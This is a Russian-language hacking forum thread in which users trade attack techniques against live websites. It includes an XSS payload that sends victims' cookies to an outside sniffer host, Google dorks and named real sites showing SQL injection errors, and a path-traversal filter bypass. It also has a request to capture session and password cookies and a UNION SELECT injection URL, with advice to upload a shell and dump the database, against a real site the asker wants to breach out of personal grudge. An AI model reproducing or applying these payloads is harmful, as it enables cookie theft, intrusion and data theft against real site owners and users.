Эм...если я не ошибаюсь, то там бйсик авторизация и пароли для входа в админку хранятся в файле htpasswd, а не в БД! (http://gnn.tv/admin)
Нашел сайт, на котором в поле личных сообщений(социалка) выполняется html код, а следовательно и javascript Недолго думая залил xss снифер на хост, составил ссылку <script>window.location.href='http://htos.ru/sniffer/s.gif?'+document.cookie;</script> проверил ссылку на лок. компутере - работает, средиректил на настоящую фотографию. начал тестировать на сайте - пошли первые рога. Отчеты не приходят, хотя скрипт съедает чисто. Как это лечится? Снифер брал с http://pashkela.narod.ru/sniffer.rar
-m0rgan-, вы гений. Точно. Нужно было зашифровать строку. 2 месяца непрерывной е**ли с сайтом и все так просто... Спасибо, -m0rgan-.
Я сталкнулся с такой проблемой. Я с трудом нахожу бажный скрипты с инекцией. Прочитал всякие faq по sql инжекшен да я и php с Mysql знаю нормально впринципе, но вт что-то с поиском не очень. Поделитесь соображениями как искать..Очень редко попадаются скрипты с уязвимостями.
2Krist_ALL тут не раз уже обсуждалась эта тема, всем вопросам ответ гугл, вбей в поиск например .php?id= или .php?news= ну или как тебе угодно, конечно можешь сразу поискать MySql error in бла бла бла..но это уже паблик и не факт что сайт либо похеканый давно либо уже в бд не существует инфы для сайта, но для тренировки сойдет
Krist_ALL, позволю поправить Gorev'a. Для поиска по урлу в гугле используется команда inurl: Пример: inurl:news.php?id=1 И пройдя по первой ссылке (http://ocenshik.mostpp.ru/news.php?id=1) Видим бажный скрипт: Code: http://ocenshik.mostpp.ru/news.php?id=1' Code: Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 95 Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 97 Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 98 Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/txh/part/news.txh on line 99 Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /bhome/part1/01/mtpp/mostpp.ru/www/ocenshik/_functions.php on line 88 по первой ссылке (www.globalwaterfoundation.org/news.php?id=1) Видим бажный скрипт: Code: www.globalwaterfoundation.org/news.php?id=1' Code: Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gloh2o/public_html/news.php on line 190 И так далее...
Krist_ALL, ну и я свои 5 копеек вставлю... то что бывает не находятся бажные скрипты абсолютно нормально =) не уязвим этот параметр, так узвим другой... то есть смотри на параметры и так далее, так же не забывай что ошибки не всегда выводятся иногда просто вырублен их вывод... поэтому стоит понаблюдать за выводом при разных значениях, грубо говоря что если при news.php?a=1' не выводится новость, а при news.php?a=1 выводится то это м.б. скуль =) хотя не факт =) короче все методом проб и ошибок =)
На счёт бажных скриптов, то не только кавычку пихать надо, есть и другие способы имитировать ошибку БД...по поводу этого можно почитать в замечательном FAQ от jokester'a (http://forum.antichat.ru/thread104591.html)
<?php $getfile = "%2E%2E%2F"; // =../ $getfile = str_replace("..", "", $getfile); $getfile = str_replace("/", "", $getfile); echo $getfile; ?>
на винде: lol=./.\file Схема такая это ./.\ пройдёт первую проверку без изменений, а после второй срежется "/". В итоге получим ..\ Если нужно ещё выше, думаю всё понятно ./.\./.\./.\ и т.д. Тоесть "." впихнуть можно, а вот "/" будут резаться
К теме о Xss Есть 3 имени cookie. PHPSESSID, .sait.ru_c_user, .sait.ru_c_password Как заставить скрипт записывать эти 3 параметра?: Супер переменная $sniffed['query'] = ($_SERVER['QUERY_STRING']); Записывает данные из PHPSESSID, как указать на то, чтобы она записывала данные из .sait.ru_c_user, .sait.ru_c_password? CMS платная, социалка ablespace
Сорри, если не туда запостил. Может есть у кого словарь с именами таблиц/полей. Был бы очень признателен и отблагодарил бы +. Ссылку в пм, пожалуйста.
Доброго дня всем Подскажите как взломать сайт и слить его базу ? У меня есть все файлы от сайта Есть название и пароль от базы данных Скрипт новости выдает ошибку при запросе: http://www.rikor-electronics.ru/news.php?id=50' вот сама ошибка: .mysql_error(). Еслиб был доступ к фтп то можно было бы залить шел, но у меня его нет Как вот с этими данными слить базу ? помогите... создатель этого сайта предал просто меня ( а дружили с детства
http://www.rikor-electronics.ru/news.php?id=-50+union+select+version(),2,3,4-- >>Есть название и пароль от базы данных Лей шелл и дампи бд)
